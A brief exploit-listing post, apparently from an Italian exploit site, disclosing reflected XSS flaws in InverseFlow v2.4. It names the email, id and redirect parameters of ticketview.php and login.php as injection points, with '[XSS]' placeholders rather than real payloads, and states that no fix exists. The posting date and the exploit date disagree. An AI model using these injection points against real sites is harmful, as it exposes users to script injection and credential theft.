InverseFlow v2.4 [XSS Vulnerabilities]

2011-10-24 15:39:15
Inviato da: Expl0its

# Exploit Title: InverseFlow v2.4 [XSS Vulnerabilities]
# Date: [Mon Nov 07 2011]
# Author: Amir Expl0its
# We Are : Expl0its , Higher_sense , Black.spook & H4ckcity.net - zone-hc.com
# Software Link: [ http://asria.info/download/script/inverseflow.zip ]
# Version: [ InverseFlow v2.4 ]


Vulnerable Page:

ticketview.php?email=
ticketview.php?email=&id=
login.php



Exploit:

http://127.0.0.1/inver/inverseflow/ticketview.php?email= [XSS]
http://127.0.0.1/inver/inverseflow/ticketview.php?email=&id=[XSS]
http://127.0.0.1/inver/inverseflow/login.php?redirect=[XSS]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.